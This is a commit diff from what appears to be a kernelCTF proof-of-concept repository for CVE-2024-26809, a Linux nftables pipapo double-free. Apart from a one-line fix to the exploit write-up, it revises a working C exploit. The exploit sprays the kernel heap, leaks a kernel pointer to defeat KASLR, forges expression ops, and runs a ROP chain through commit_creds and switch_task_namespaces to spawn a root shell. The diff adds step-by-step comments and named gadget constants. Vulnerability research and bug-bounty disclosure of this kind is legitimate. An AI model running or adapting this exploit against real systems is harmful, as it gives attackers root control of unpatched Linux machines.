Solve comments

Author: conlonial

pocs/linux/kernelctf/CVE-2024-26809_lts_cos/docs/exploit.md

@@ -1,5 +1,5 @@
 # Exploit detail about CVE-2024-26809
-If you want to get some base information about CVE-2024-1085, please read [vulnerability.md](./vulnerability.md) first.
+If you want to get some base information about CVE-2024-26809, please read [vulnerability.md](./vulnerability.md) first.
 
 ## Background
 nftables is a netfilter project that aims to replace the existing {ip,ip6,arp,eb}tables framework, providing a new packet filtering framework for {ip,ip6}tables, a new userspace utility (nft) and A compatibility layer. It uses existing hooks, link tracking system, user space queuing component and netfilter logging subsystem.

pocs/linux/kernelctf/CVE-2024-26809_lts_cos/exploit/cos-105-17412.294.34/.old.c.swp

@@ -27,18 +27,18 @@
 #include "setelem.h"
 #include "table.h"
 #include "set.h"
+#include "rop.h"
 
 char *leak_data = NULL;
 char *table_udata = NULL;
 int table_num = 0;
-uint64_t leak_ops = 0, leak_heap = 0, kernel_off = 0;
+uint64_t kernel_off = 0;
 unsigned long user_cs,user_ss,user_rsp,user_rflags;
 
 void shell(){
     printf("ret2usr success! uid : %d\n",getuid());
     char *args[] = {"/bin/sh", "-i", NULL};
     execve(args[0], args, NULL);
-    //while(1);
 }
 
 static void save_state() {
@@ -59,7 +59,6 @@ void pin_on_cpu(int cpu) {
     perror("sched_setaffinity()");
     exit(EXIT_FAILURE);
   }
-  usleep(1000);
 }
 
 int setup_sandbox(void) {
@@ -71,22 +70,20 @@ int setup_sandbox(void) {
     perror("[-] unshare(CLONE_NEWNET)");
     return -1;
   }
-  pin_on_cpu(0);
   return 0;
 }
 
 
 
 void send_msg_list(struct nl_sock * socket, struct nlmsghdr **msg_list, int num){
     struct nl_msg * msg = nlmsg_alloc();
-    //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE);
     struct nlmsghdr *hdr1 = nlmsg_put(
             msg,
             NL_AUTO_PORT, // auto assign current pid
             NL_AUTO_SEQ, // begin wit seq number 0
             NFNL_MSG_BATCH_BEGIN,   // TYPE
             sizeof(struct nfgenmsg),
-            NLM_F_REQUEST //NLM_F_ECHO
+            NLM_F_REQUEST 
     );
     struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg));
     h->nfgen_family = 2;
@@ -100,7 +97,7 @@ void send_msg_list(struct nl_sock * socket, struct nlmsghdr **msg_list, int num)
             NL_AUTO_SEQ, // begin wit seq number 0
             NFNL_MSG_BATCH_END,// TYPE
             sizeof(struct nfgenmsg),
-            NLM_F_REQUEST //NLM_F_ECHO
+            NLM_F_REQUEST 
     );
     uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len);
     int i;
@@ -128,10 +125,8 @@ int nl_callback_get_table(struct nl_msg* recv_msg, void* arg)
     struct nlmsghdr * ret_hdr = nlmsg_hdr(recv_msg);
     struct nlattr * tb_msg[NFTA_TABLE_MAX+1];
     memset(tb_msg, 0, NFTA_TABLE_MAX * 8);
-    //printf("Get message back!\n");
 
     if (ret_hdr->nlmsg_type == NLMSG_ERROR) {
-        //printf("Received NLMSG_ERROR message!\n");
         return NL_STOP;
     }
 
@@ -171,7 +166,8 @@ void exploit(struct nl_sock *socket){
     char *target_obj = "obj for exp";
 
     new_table(socket, table);
-    new_set_pipapo(socket,table, pipapo_set, 0x40, NFT_OBJECT_CT_EXPECT);
+    //Step 1 Create a pipapo set `A`
+    new_set_pipapo(socket,table, pipapo_set, 0x40, NFT_OBJECT_CT_EXPECT);//Set A
     new_set_bitmap(socket, table, bitmap_set);
 
     char *key = malloc(0x40);
@@ -180,22 +176,24 @@ void exploit(struct nl_sock *socket){
     memset(pad,0x41,0x100);
     uint64_t hash_key;
 
-    //trigger the vulnerability
+    //Step 2 Create element `B` and element `C` in set `A`.
     new_obj_ct_expect(socket, table, target_obj, NULL, 0);
     memset(key,0x41,0x40);
     spray_tables(socket,0x200, pad, 0xd0);
-    new_setelem(socket, table, pipapo_set, pad, 0x80, target_obj, key, 0x40, NULL, 0, 0);
+    new_setelem(socket, table, pipapo_set, pad, 0x80, target_obj, key, 0x40, NULL, 0, 0);//Set element B
     memset(key,0x42,0x40);
-    new_setelem(socket, table, pipapo_set, pad, 0x80, target_obj, key, 0x40, NULL, 0, 0);
+    new_setelem(socket, table, pipapo_set, pad, 0x80, target_obj, key, 0x40, NULL, 0, 0);//Set element C
     spray_tables(socket,0x200, pad, 0xd0);
+    //Step 3
     struct nlmsghdr **msg_list = malloc(sizeof(struct nlmsghdr *)*5);
     memset(msg_list, 0, sizeof(struct nlmsghdr *)*5);
     memset(key,0x43,0x40);
-    msg_list[0] = new_setelem_msg(table, pipapo_set, pad, 0x80, target_obj, key, 0x40, NULL, 0);
+    msg_list[0] = new_setelem_msg(table, pipapo_set, pad, 0x80, target_obj, key, 0x40, NULL, 0);//Set element D
     msg_list[1] = del_set_msg(table, pipapo_set);
     send_msg_list(socket, msg_list, 2);
-    sleep(0.1);
+    sleep(1);//Waiting the function nf_tables_commit
     //Now we try to get the heap back and check if we success
+    //Step 4 Try to alloc the heap of the set element `C` back by creating `nft_table` with `NFTA_TABLE_USERDATA`.
     struct nl_sock * socket2 = nl_socket_alloc();
     if(nfnl_connect(socket2)<0){
         printf("nfnl_connect fail!\n");
@@ -204,7 +202,7 @@ void exploit(struct nl_sock *socket){
     nl_socket_modify_cb(socket2,NL_CB_MSG_IN, NL_CB_CUSTOM, nl_callback_get_table, NULL);
     int try_num = 0;
     char *table_name = malloc(0x100);
-    int a=0,b=0;
+    int e=0,f=-1;
     while(1){
 	printf("trying %d\n",try_num);
 	snprintf(table_name, 0x100, "table for test %d", try_num);
@@ -219,14 +217,15 @@ void exploit(struct nl_sock *socket){
 		printf("Get udata : %d\n", *(int *)table_udata);
 		if(*(int *)table_udata != i){
 		//It means we get two same object from the free list of kernel heap.
-			a = *(int *)table_udata;
-			b = i;
+			e = *(int *)table_udata;
+			f = i;
 			break;
 		}
 	}
-	if(b!=0)
+	if(f!=-1)
 		break;
 	try_num++;
+	sleep(0.1);//Waiting the function nf_tables_commit
 
     }
     //Now, we free many object to avoid crash
@@ -238,81 +237,93 @@ void exploit(struct nl_sock *socket){
 	snprintf(tmp, 0x100, "table_for_leak_%ld", i);
         del_table(socket, tmp);
     }
-    sleep(0.5);
+    sleep(0.5);//Waiting the function nft_commit_release which finally call nf_tables_table_destroy
 
-    printf("We get it! A: %d B: %d \n", a, b);
+    printf("We get it! E: %d F: %d \n", e, f);
 
-    snprintf(tmp, 0x100, "table for test %d", a);
-    //free one of it.
+    snprintf(tmp, 0x100, "table for test %d", e);
+    //Step 5 Delete `nft_table E`.
     del_table(socket, tmp);
-    sleep(5);
+    sleep(5);//Waiting the function nft_commit_release which finally call nf_tables_table_destroy
     uint16_t bitmap_key = 0;
     i=0;
+    //Step 6 Spray heap to get the heap of `nft_table E->udata` back.
     while(1){	
 	bitmap_key = i;
-	new_setelem_with_expr(socket, table, bitmap_set, pad, 0xb0, NULL, &bitmap_key, 2, NULL, 0);
-	snprintf(tmp, 0x100, "table for test %d", b);
-    	get_table(socket2, tmp);
+	new_setelem_with_expr(socket, table, bitmap_set, pad, 0xc0, NULL, &bitmap_key, 2, NULL, 0);
+	snprintf(tmp, 0x100, "table for test %d", f);
+    	get_table(socket2, tmp);//[1]
     	nl_recvmsgs_default(socket2);
     	nl_recvmsgs_default(socket2);
-    	printf("Get ops 0x28: %llx\n",*(uint64_t *)(table_udata+0x28));
-	if(((*(uint64_t *)(table_udata+0x28)) & 0xfff ) == 0xF20){
-    	    break;	
+    	printf("Get ops : %llx\n",*(uint64_t *)(table_udata+0x28));//0x28 = offset(elem, expr[0]->ops), the elem is created by function nft_set_elem_init
+	if(((*(uint64_t *)(table_udata+0x28)) & 0xfff ) == 0x2e0){
+    	    break;
 	}
-	sleep(0.1);
+	sleep(0.1);//Waiting the function nf_tables_commit.
 	i++;
     }
     //Save it. We will use it later.
+    //Step 7: Dump `nft_table F`. We have dump it in [1]
     char *setelem_data = malloc(0x100);
     memcpy(setelem_data, table_udata, 0xd0);
-    kernel_off = *(uint64_t *)(table_udata+0x28) - 0xFFFFFFFF82ACAF20; //nft_last_ops
+    kernel_off = *(uint64_t *)(table_udata+0x28) - NFT_LAST_OPS;//nft_last_ops, 0x28 = offset(elem, expr[0]->ops), the elem is created by function nft_set_elem_init
     //now we get ops, we try to add a small setelem and leak it. We will use this setelem as expr->ops target.
+    //Step 8: Create another set element `G`. 
     bitmap_key++;
-    new_setelem(socket, table, bitmap_set, pad, 0x60, NULL, &bitmap_key, 2, NULL, 0, 0);
-    snprintf(tmp, 0x100, "table for test %d", b);
+    new_setelem(socket, table, bitmap_set, pad, 0x60, NULL, &bitmap_key, 2, NULL, 0, 0);//set element G
+    snprintf(tmp, 0x100, "table for test %d", f);
+
     get_table(socket2, tmp);
     nl_recvmsgs_default(socket2);
     nl_recvmsgs_default(socket2);
-    printf("Get next setelem : %llx\n",*(uint64_t *)table_udata);
+    printf("Get next setelem : %llx\n",*(uint64_t *)table_udata);// 0 = offset(head.next,struct nft_bitmap_elem)
 
-    uint64_t ops_addr = *(uint64_t *)table_udata;
+    uint64_t ops_addr = *(uint64_t *)table_udata;//We use the heap of the next set element as the expr[0]->ops
     //Free the small setelem, and fill it with our target expr->ops->dump and expr->ops->type
+    //Step 9 : Delete set element `G`.Fill the heap memory of set element `G` through heap spraying.
     del_setelem(socket, table, bitmap_set, &bitmap_key, 2, NULL, 0);
-    //ops->dump
-    *(uint64_t *)&pad[0x40] = kernel_off + 0xffffffff811b0023;//leave ; ret
-    //ops->type
-    *(uint64_t *)&pad[0x70] = kernel_off + 0xFFFFFFFF8371BF00;//last type
+    sleep(1);//Waiting the function nft_commit_release which finally call nf_tables_set_elem_destroy
+    //fake ops->dump
+    *(uint64_t *)&pad[0x40] = kernel_off + LEAVE_RET;
+    //fake ops->type
+    *(uint64_t *)&pad[0x78] = kernel_off + NFT_LAST_TYPE;/*the address of nft_last_type
+                                  In function nf_tables_fill_expr_info:
+                                    if (nla_put_string(skb, NFTA_EXPR_NAME, expr->ops->type->name))
+                                  so we need to fake ops->type to avoid kernel crash
+                                  */
     spray_tables(socket,0x200, pad, 0x80);
     //Now we try to control ip by faking another expr in set elem.
     //build fake setelem
     *(uint64_t *)&setelem_data[0x28] = ops_addr; //expr[0]->ops
     //start ROP
-    *(uint64_t *)&setelem_data[0x30] = kernel_off + 0xFFFFFFFF813E36EE;//pop rdi; ret
-    *(uint64_t *)&setelem_data[0x38] = kernel_off + 0xFFFFFFFF83462180;//init_cred
-    *(uint64_t *)&setelem_data[0x40] = kernel_off + 0xFFFFFFFF8110E830;//commit_creds;
-    *(uint64_t *)&setelem_data[0x48] = kernel_off + 0xFFFFFFFF813E36EE;//pop rdi ; ret
+    *(uint64_t *)&setelem_data[0x30] = kernel_off + POP_RDI_RET;
+    *(uint64_t *)&setelem_data[0x38] = kernel_off + INIT_CRED;
+    *(uint64_t *)&setelem_data[0x40] = kernel_off + COMMIT_CREDS;
+    *(uint64_t *)&setelem_data[0x48] = kernel_off + POP_RDI_RET;
     *(uint64_t *)&setelem_data[0x50] = 1;
-    *(uint64_t *)&setelem_data[0x58] = kernel_off + 0xFFFFFFFF81105680;//find_task_by_vpid
-    *(uint64_t *)&setelem_data[0x60] = kernel_off + 0xffffffff8102c701;//mov rdi, rax ; mov eax, ebx ; pop rbx ; or rax, rdi ; ret
+    *(uint64_t *)&setelem_data[0x58] = kernel_off + FIND_TASK_BY_VPID;
+    *(uint64_t *)&setelem_data[0x60] = kernel_off + MOV_RDI_RAX_POP_RBX_RET;
     *(uint64_t *)&setelem_data[0x68] = 0;
-    *(uint64_t *)&setelem_data[0x70] = kernel_off + 0xffffffff811aaf4a;//pop rsi ; ret
-    *(uint64_t *)&setelem_data[0x78] = kernel_off + 0xFFFFFFFF83461F40;//init_nsproxy
-    *(uint64_t *)&setelem_data[0x80] = kernel_off + 0xFFFFFFFF8110CE30;//switch_task_namespaces
-    *(uint64_t *)&setelem_data[0x88] = kernel_off + 0xFFFFFFFF82002107;//swapgs; ret
-    *(uint64_t *)&setelem_data[0x90] = kernel_off + 0xFFFFFFFF822011A7;//iretq
+    *(uint64_t *)&setelem_data[0x70] = kernel_off + POP_RSI_RET;
+    *(uint64_t *)&setelem_data[0x78] = kernel_off + INIT_NSPROXY;
+    *(uint64_t *)&setelem_data[0x80] = kernel_off + SWITCH_TASK_NAMESPACES;
+    *(uint64_t *)&setelem_data[0x88] = kernel_off + SWAPGS_RET;
+    *(uint64_t *)&setelem_data[0x90] = kernel_off + IRETQ;
     *(uint64_t *)&setelem_data[0x98] = (uint64_t)shell;
     *(uint64_t *)&setelem_data[0xa0] = user_cs;
     *(uint64_t *)&setelem_data[0xa8] = user_rflags;
-    *(uint64_t *)&setelem_data[0xb0] = user_rsp|8;
+    *(uint64_t *)&setelem_data[0xb0] = user_rsp|8;//You don't need to add '|8' when exploiting kernelctf.vrp.ctfcompetition.com:1337) It seems that without this '|8', a stack error will occur during github pull check. I haven't studied why this problem occurs, but I guess it has something to do with the stack alignment when returning to the function shell.
     *(uint64_t *)&setelem_data[0xb8] = user_ss;
 
-    //del table b first
+    //Step 10: Delete `nft_table F`.
     del_table(socket, tmp);
+    //Step 11 and 12
     //Try to get it back and control RIP
+    sleep(5);//Waiting the function nft_commit_release which finally call nf_tables_table_destroy
     bitmap_key = i;
     int t=0;
     while(1){
-	sleep(0.1);
+	sleep(0.1);//Avoid heap crashes caused by excessive kmalloc.
     	spray_tables(socket, 1, setelem_data, 0xd0);
         get_setelem(socket, table, bitmap_set, &bitmap_key, 2);
     	printf("%d\n",t);
@@ -323,18 +334,27 @@ void exploit(struct nl_sock *socket){
     while(1);
 }
 
+
+struct nl_sock * setup_nl_socket(){
+    struct nl_sock * socket = nl_socket_alloc();
+
+    if(nfnl_connect(socket)<0){
+        printf("nfnl_connect fail!\n");
+        return NULL;
+    }
+    return socket;
+}
+
 int main(void) {
     if (setup_sandbox() < 0){
         printf("Create sandbox fail!\n");
         return 0;
     }
+    pin_on_cpu(0);
     save_state();
-    struct nl_sock * socket = nl_socket_alloc();
-
-    if(nfnl_connect(socket)<0){
-    	printf("nfnl_connect fail!\n");
-	return 0;
-    }
+    struct nl_sock * socket = setup_nl_socket();
+    if(socket == NULL)
+	    return 0;
     exploit(socket);
     return 0;
 }